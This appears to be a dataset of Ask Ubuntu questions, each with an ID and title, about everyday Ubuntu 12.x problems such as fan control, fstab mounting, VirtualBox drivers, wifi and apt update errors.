232781	fan running uncontrolled on dell vostro 3560 under ubuntu 12.10	edit : it is 4 months since i asked this question , more than 1000 views , but the bug is still unassigned on launchpad . i suggest that everybody affected logs in and subscribes himself as being affected . i have switched off the dedicated graphics : 0 : igd : + : pwr:0000:00:02.0 1 : dis : : off:0000:01:00.0 this is the output of the `` sensor '' - command , whith fan running on full speed : radeon-pci-0100 adapter : pci adapter temp1 : -128.0°c coretemp-isa-0000 adapter : isa adapter physical id 0 : +42.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +41.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +41.0°c ( high = +87.0°c , crit = +105.0°c ) is there a safe solution to this , and when can we expect ubuntu to cover fan throtteling ? edit : weirdly enough , it now suddenly switched off almost completely . here is the sensor - output again : radeon-pci-0100 adapter : pci adapter temp1 : -128.0°c coretemp-isa-0000 adapter : isa adapter physical id 0 : +41.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +41.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +39.0°c ( high = +87.0°c , crit = +105.0°c ) this is weird ! but the behavior seems to correspond to the bug report filed here : https : //bugs.launchpad.net/ubuntu/+source/acpi/+bug/1049064 edit : i am running the gnome3- flavour
232788	migrate ubuntu studio 12.0.4 to new machine also using ubuntu 12.0.4	i have been attempting to find the proper avenue to migrate my ubuntu studio 12.0.4 ( low latency ) user account , settings , and programs . my mac is running a virtual machine with the prior ubuntu version mentioned on parallels desktop 7 . i have a ubuntu configuration that i 'm comfortable with and i would loath having to spend hours tweaking everything to my liking . *i utilized my laptop as a test machine and i question how to avoid any migration of drivers . i also seriously doubt they would be compatible , although i could be mistaken about this . does anyone know how to do this without causing an unstable system ? as you can see from the title of my account i 'm a ubuntu novice that is migrating from mac osx lion & windows 7 and these are totally different systems . therefore , i require more instruction and descriptiveness than most . i am not well acclimated with ubuntu yet . however , i 'm a quick learner and i 'll figure out how to implement what 's imparted on me . thank you in advance for any advise you take the time out to give me .
232790	automount ext4 partition with user permission/ownership ( fstab ? )	i just installed lubuntu 12.10 `` quantal quetzal '' on my acer aspire one d257 , creating the partitions : $ df -h filesystem size used avail use % mounted on /dev/sda5 15g 2.1g 12g 15 % / ... /dev/sda1 1008m 62m 896m 7 % /boot /dev/sda6 15g 180m 14g 2 % /home /dev/sda4 195g 188m 185g 1 % /media/data ( or see partitions.png : ) ( i know boot partitions were useful for old bios , but now they are also useful for encryption , lvm ... ( though differerent from a dedicated grub partition ! ) ) i renamed the `` data '' partition ( =sda4 ) flag/name ( using utility disks ) . i have been trying for hours now to find a solution to : how to get my data partition ( not my home partition ! ) to auto-mount at boot time somewhere ( if possible in /media/data ) with me ( user = christophe ) as owner and the permissions as rwxrwxr-x ( =user : rwx , group : rwx , other : r-x ) ? my problems are that every time i reboot : /media/data is back under root ownership /media/data is back under rwxr-xr-x permissions /media/data content is back as just lost+found ( ! ! ! ) frequently , when trying options in /etc/fstab , i had `` an error occurred while mounting /media/data '' at boot time . i tried mostly to edit my /etc/fstab file . now it is : $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda5 during installation uuid=8325697c-2c27-49dd-99f8-2a1a3e1467be / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=3ba24cc6-e38b-48d9-b526-68358783d980 /boot ext4 defaults 0 2 # /home was on /dev/sda6 during installation uuid=1ef16ece-0965-4611-a2e5-dd687f4ee5ff /home ext4 defaults 0 2 # /media/data was on /dev/sda4 during installation # uuid=0598f54b-dcf8-4508-97de-94d9f2c5e2a8 /media/data ext4 defaults 0 2 uuid=0598f54b-dcf8-4508-97de-94d9f2c5e2a8 /media/data ext4 rw , suid , dev , exec , auto , user , async , errors=remount-ro , relatime , uid=1000 , gid=1000 0 2 # swap was on /dev/sda2 during installation uuid=04f73159-479d-4a4b-a78c-37a406909225 none swap sw 0 0 in a way , i 'd like my data partition to automount like my home partition . i do not want a solution where i would have to chmod or chown or do something every time i ( re ) boot ! thanks .
232792	can not connect to wifi virtualbox ubuntu 12.04 on macbook pro	i run two vms on a macbook pro : windows7 and ubuntu 12.04 . both can connect to lans via hardwired connections ; windows 7 connects also connects automatically to any authorized wifi network . ubuntu 12.04 can not find a wifi network . iwconfig reports `` no wireless extensions . '' virtualbox 's devices/network adapters ' bridged option , however , recognizes the macbook 's airport wifi adapter . despite hours of reading and searching and experimentation , i 'm making no progress . does anyone have any suggestions ? ? ?
232799	permission denied on key while trying to change the swappiness- ubuntu 12.10	how to change the swappiness of my 12.10 ubuntu system from 60 to 10 . getting response as permission denied : - steps - i am following are below : neeta @ neeta-desktop : ~ $ cat /proc/sys/vm/swappiness 60 neeta @ neeta-desktop : ~ $ sysctl vm.swappiness=10 sysctl : permission denied on key 'vm.swappiness'
232803	trouble starting virtualbox missing kernel driver	i am trying to install oracle virtualbox on ubuntu . i have installed virtualbox-4.2 from the oracle website without a hiccup ; however , when i create a new windows and try to start it i get the following two error messages . one says : kernel driver not installed ( rc=-1908 ) and proceeds to tell me to run /etc/init.d/vboxdrv setup the other says : failed to open a session for the virtual machine . the virtual machine has terminated unexpectedly during startup with exit code 1 . i tried sudo /etc/init.d/vboxdrv setup and discovered that vboxdrv does not exist in the init.d directory . i have been trying to install this for some time without success . i would be very grateful for any help any one could offer .
232805	where to get ubuntu one for ipad ?	the download page for iphone and ipad seems only to offer apps for iphone . i need one for ipad . is one available ? if so where ?
232806	ca n't update using system updater	this is the message it gives me : w : failed to fetch http : //ppa.launchpad.net/sevenmachines/flash/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/sevenmachines/flash/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
232811	can ubuntu get just a little more annoying ? please ?	why do keep getting internal error messages , and why should i care them ?
232813	connecting vodafone 3g gprs mobile to ubuntu 12.04 laptop for internet	i am using vodafone 3g through my mobile samsung b7320 . i connected it via usb cable to my laptop running ubuntu 12.04 . a `` wired connection established '' message appeared . then i tried to access the internet , but it 's not working . is there any additional configuration step that i should perform ?
232817	loading ac3 files in vlc player	i have mkv and english.ac3 files . that mkv plays with the default audio stream which is not english . how do i load english.ac3 and play it with mkv at the same time ?
232819	no live media found when installing ubuntu	i am trying to install ubuntu 12 in to my desktop and once i insert the dvd in to my rom the dvd rom reads the disk but then it says `` no live media found '' i tried the same in my laptop it works perfectly . is there any problem in my dvd rom ?
232820	grub2 hotkey os selection	i believe the answer is no , but i just wanted to confirm that it is not possible to configure grub2 to select an os via a single hotkey press . it just seems like a convenient way to navigate and i was hoping to create a splash screen of my own design with the oses as bitmaps rather than text overlaid on the background . thanks .
232822	how to make andoid 4. look like ubuntu 12.04 ?	i bought a new 10 inch tab that runs on android ice cream sandwich , i am too scared to unlock the tab to install ubuntu at the same time i dont feel comfortable to work on any machine that doesnt look like ubuntu , so i wanted a way to make and completely look like unity , thanks for any help
232823	how do i set up a default profile for new users ?	i am building a new pc for my fiancee 's family , and want to set it up so that some setting are defaulted when a new user account for each family member is created . the settings i 'm looking to set up are : background opacity of the top bar and the unity launcher the default icons in the unity launcher and on the desktop the size of the unity icons default applications for music , web browser , etc . any suggestions would be greatly appreciated !
232824	windows 8 does n't recognise ubuntu 12.10	i 've managed to install ubuntu 12.10 on my computer . the bios recognises it , the live usb recognises there 's an installation but windows 8 does n't . i have disabled safe boot in the bios . how can i boot into ubuntu with the windows 8 boot menu ?
232825	sudo su command not working	previous happenings here : ubuntu is booting into terminal instead of gui interface for some reason when i boot my computer up , instead of automatically entering into my normal interface , i have to chose between my account and the guest account . when i try to log into my account , it tells me that my password is incorrect . it is not incorrect . i even changed it through the root menu and it still did n't work . so , i 'm having to log in as a guest . i have tried the command `` sudo su '' several times . and each time i do , it comes up with this : `` sudo : unable to change to sudoers gid : operation not permitted sudo : setresuid ( ) [ 0 , 0 , 0 ] - > [ 124 , -1 , -1 ] : operation not permitted '' i 'm assuming it 's because i 'm in guest , but every time i try to type in a command , it tells me `` permission denied '' or something of that sort . i really need to log in to my regular account . it 's not a password issue . in my recent post that i linked , i was told that it was probably either a malware issue ( which i 'm unsure of how to get rid of ) or a security issue , as in , someone hacked into my computer . i 'm not sure which it is . but i desperately need help . i have done nothing but research every response that i 'm getting from the command-line , but everything that i 've found has n't helped because , like i said , every command i try to type just denies me permission . if this is a malware issue , how do i fix it ? if it is a security issue , how do i fix it ? i 'm not new to ubuntu , but i 've never had a problem like this before until i upgraded to 12.04 . please , any suggestions would be greatly appreciated !
232828	how do i install freemat 4.1 on 12.10 32 bit ?	how do i install freemat 4.1 on 12.10 32 bit ? the latest version available in the software centre or from other debian package sources is 4.0 . using alien on the rpm package available at freemat sourceforge does n't work because it is 64 bit . i 've tried to use the source code release but it was n't in the form i knew how to install it . ( that is with configure and makefiles ) installing from source code seems like the only viable method of installing it but i just do n't know how to .
232832	atheros wifi not working 12 lts	i know this question has been discussed thousand times , but i think my situation is little bit different . i am using a giada mini pc this model the wifi works well with lubuntu ( light version of ubuntu ) but it does not work with ubuntu . i tried most of the work around in askubuntu and other blogs but it does not seem to work . please find below detailed information of the install lscpi -nn 03:00.0 network controller [ 0280 ] : atheros communications inc. device [ 168c:0037 ] ( rec 01 ) if i modprobe ath9k and ath5k drivers the dmesg does show some wifi antenna details but the wifi ( wlan0 ) does not appear in ifconfig/iwconfig . i did service networking restart but no luck . i also tried that nohwcryp=1 for atheros drivers no luck . appreciate any help to get wifi work on this . moreover , if you are suggesting any apt-get based installation please note that i ca n't connect wired connection to this so wo n't be able to go apt-get over internet . i could only download packages in usb stick and install it manually . looks like the driver does not has support for 168c:0037 device id
232834	what is the ideal way to install vmware and vmware tools for ubuntu 12.10	i have downloaded vmware-player-5.0.1-894247.exe from this official website . also downloaded ubuntu 12.10 from ubuntu official website . now , here comes my pain . i have installed vmware and then chose to install ubuntu by mounting the iso file instead of choosing i will install later . now ubuntu take approx 30-40 mins to get installed and after that i go to vmware setting and share my workspace ( one of ruby on rails project ) , that i need in vmware for further development . but when i browse from home/mnt i can not see hgfs folder . i can not see my shared folder anywhere . from the past 2 weeks i 'm trying my best to get my project inside vmware . but i ca n't get it . i have again reinstalled vmware tools.. but once i got a message : as shared folder is not enabled ( somewhhat.. i do n't remember what was the message , but it was related to shared ) . please guide me as i want to start working on my project .
232835	how to fix `` no installation candidate '' error installing pessulus on ubuntu 12.10 ?	how can i install pessulus on ubuntu 12.10 ? we are currently upgrading hardware and ubuntu 12.10 supports the multi-touch screen that we 're about to use . when i enter the command apt-get install pessulus in the command line , i get this message : reading package lists ... done building dependency tree reading state information ... done package pessulus is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'pessulus ' has no installation candidate what do i need to do to install pessulus ? i 'd be grateful for any help .
232836	getting specific 'out of memory ! ' message when running very involved perl script	i 'm running a perl script that parses information from around 7,000 html files . probably not really relevant , but i 'm just trying to describe that this is , well , doing a lot of stuff . i originally had them just print out the information i was looking for right into the terminal and then i pasted that into my spreadsheet . however , about half way through , i was told that i was out of memory and it stopped . out of memory ! - nothing else i googled , but i could n't find anything that talked about the terminal specifically printing this . i could find posts related to linux about just generally running out of memory , but i wanted to be sure . i 've tried , with no success , to have it write to a .txt file instead of printing out into the terminal . how can i fix this and let the perl script run all the way through ?
232837	how to install bsnl evdo u500 data card in ubuntu ?	i am having a bsnl evdo rev a usb data card model no . : t-u500 and want to install it in my ubuntu which has no internet connection . what should i do ? i have asked similar questions in : how to install wvdial without getting the following error ? install bsnl evdo card in ubuntu 12.10 you may refer them
232839	i ca n't update , upgrade and remove my app from kubuntu	i have a problem upgrading software . i ca n't update , upgrade or remove my software . the notification of update manager signs 46 security packets and 83 other packets and when i click on it to install them another window comes up and is written : not all packages could be marked for upgrade . the available upgrades may require new packages to be installed or removed . do you want to mark upgrades that may require the installation or removal of additional packages ? and i have two possibilites : mark updates or no independently from my answer i receive two error windows : the first one is : failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/c/coreutils/coreutils_8.13-3ubuntu3.1_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apt/libapt-pkg4.12_0.8.16~exp12ubuntu10.5_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apt/apt_0.8.16~exp12ubuntu10.5_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apt/libapt-inst1.4_0.8.16~exp12ubuntu10.5_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apparmor/apparmor_2.7.102-0ubuntu3.4_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //security.ubuntu.com/ubuntu/pool/main/a/apparmor/apparmor_2.7.102-0ubuntu3.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.8.dfsg-5.1ubuntu4.2_i386.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.8.dfsg-5.1ubuntu4.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-common_5.5.28-0ubuntu0.12.04.2_all.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/libmysqlclient18_5.5.28-0ubuntu0.12.04.2_i386.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/libmysqlclient18_5.5.28-0ubuntu0.12.04.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.5-2ubuntu1.3_i386.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.5-2ubuntu1.3_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-server_5.5.28-0ubuntu0.12.04.2_all.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-server-5.5_5.5.28-0ubuntu0.12.04.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client_5.5.28-0ubuntu0.12.04.2_all.deb 404 not found failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apt/apt-utils_0.8.16~exp12ubuntu10.5_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apt/apt-transport-https_0.8.16~exp12ubuntu10.5_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client-5.5_5.5.28-0ubuntu0.12.04.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client-core-5.5_5.5.28-0ubuntu0.12.04.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-server-core-5.5_5.5.28-0ubuntu0.12.04.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc83_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns81_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc80_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apport/python-problem-report_2.0.1-0ubuntu15_all.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apport/python-apport_2.0.1-0ubuntu15_all.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg82_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres80_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apport/apport_2.0.1-0ubuntu15_all.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apport/apport-kde_2.0.1-0ubuntu15_all.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/p/postgresql-9.1/libpq5_9.1.6-0ubuntu12.04.1_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-80_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-globalmenu_16.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_16.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-locale-en_16.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/multiverse/f/flashplugin-nonfree/flashplugin-installer_11.2.202.251ubuntu0.12.04.1_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.7.8.dfsg-5.1ubuntu4.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-generic_3.2.0.33.36_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-generic_3.2.0.33.36_amd64.deb 404 not found failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-generic_3.2.0.33.36_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-generic_3.2.0.33.36_amd64.deb 404 not found failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-globalmenu_16.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/aptdaemon/aptdaemon_0.43+bzr805-0ubuntu6_all.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/aptdaemon/python-aptdaemon_0.43+bzr805-0ubuntu6_all.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-globalmenu_16.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_16.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found when i click on ok it appears another one : the following errors occurred while applying changes : package : ubuntu-keyring details error : subprocess installed post-installation script returned error exit status 127 the second one is : failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/c/coreutils/coreutils_8.13-3ubuntu3.1_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apt/libapt-pkg4.12_0.8.16~exp12ubuntu10.5_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apt/apt_0.8.16~exp12ubuntu10.5_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apt/libapt-inst1.4_0.8.16~exp12ubuntu10.5_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apparmor/apparmor_2.7.102-0ubuntu3.4_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //security.ubuntu.com/ubuntu/pool/main/a/apparmor/apparmor_2.7.102-0ubuntu3.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.8.dfsg-5.1ubuntu4.2_i386.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.8.dfsg-5.1ubuntu4.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-common_5.5.28-0ubuntu0.12.04.2_all.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/libmysqlclient18_5.5.28-0ubuntu0.12.04.2_i386.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/libmysqlclient18_5.5.28-0ubuntu0.12.04.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.5-2ubuntu1.3_i386.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.5-2ubuntu1.3_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-server_5.5.28-0ubuntu0.12.04.2_all.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-server-5.5_5.5.28-0ubuntu0.12.04.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client_5.5.28-0ubuntu0.12.04.2_all.deb 404 not found failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apt/apt-utils_0.8.16~exp12ubuntu10.5_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apt/apt-transport-https_0.8.16~exp12ubuntu10.5_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client-5.5_5.5.28-0ubuntu0.12.04.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client-core-5.5_5.5.28-0ubuntu0.12.04.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-server-core-5.5_5.5.28-0ubuntu0.12.04.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc83_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns81_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc80_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apport/python-problem-report_2.0.1-0ubuntu15_all.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apport/python-apport_2.0.1-0ubuntu15_all.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg82_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres80_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apport/apport_2.0.1-0ubuntu15_all.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/apport/apport-kde_2.0.1-0ubuntu15_all.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/p/postgresql-9.1/libpq5_9.1.6-0ubuntu12.04.1_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-80_9.8.1.dfsg.p1-4ubuntu0.4_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-globalmenu_16.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_16.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-locale-en_16.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/multiverse/f/flashplugin-nonfree/flashplugin-installer_11.2.202.251ubuntu0.12.04.1_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.7.8.dfsg-5.1ubuntu4.2_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-generic_3.2.0.33.36_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-generic_3.2.0.33.36_amd64.deb 404 not found failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-generic_3.2.0.33.36_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-generic_3.2.0.33.36_amd64.deb 404 not found failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-globalmenu_16.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/aptdaemon/aptdaemon_0.43+bzr805-0ubuntu6_all.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //it.archive.ubuntu.com/ubuntu/pool/main/a/aptdaemon/python-aptdaemon_0.43+bzr805-0ubuntu6_all.deb 404 not found [ ip : 193.206.140.37 80 ] failed to download http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-globalmenu_16.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found failed to download http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_16.0.2+build1-0ubuntu0.12.04.1_amd64.deb 404 not found i tryed to run : sudo apt-get update and then sudo apt-get upgrade or sudo apt-get dist-upgrade but when i run sudo apt-get updatethis is the result : http : //paste.ubuntu.com/1468542/ when i do `` sudo apt-get dist-upgrade '' : http : //paste.ubuntu.com/1468859/ how can i fix the problem ? edit : reading at the errors i 've thought that the problem can be ubuntu-keyring . i searched in ask.ubuntu and i found this link : problems updating system with apt-get and i tryed : : ~ $ sudo rm -r /var/lib/apt/lists/* : ~ $ sudo apt-get update here is the result : http : //paste.ubuntu.com/1475133/ and : : ~ $ sudo apt-get upgrade here is the result : http : //paste.ubuntu.com/1475136/ edit2 : i looked at the error and i guessed that maybe the fault is libreadline . i asked something about it here : http : //dba.stackexchange.com/questions/31143/libreadline-so-6/31177 and at the end i removed the file , i upgraded the systems successfully , but when i restarted the system the file removed was still there . so the problem remain . thank you so much for helping me
232840	my makefile results in : no rule to make target `arch/x86/tools/relocs.c ' , needed	i am using ubuntu 12.04 . i wrote a simple hello world kernel module ( hello.c ) . i wrote the folllowing makefile for it : obj-m+=hello.o kdir : = /usr/src/linux-headers-3.2.0-24-generic-pae all : $ ( make ) -c $ ( kdir ) subdirs= $ ( pwd ) modules clean : rm -rf *.o *.ko *.mod . * *.symvers *.order but this error cropped up when i did make from kernel : make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-24-generic-pae' make [ 2 ] : *** no rule to make target `arch/x86/tools/relocs.c ' , needed by `arch/x86/tools/relocs ' . stop . hello.c and makefile are in /documents/module_prog . i ran make from that directory . what is causing this error and how can i fix it ?
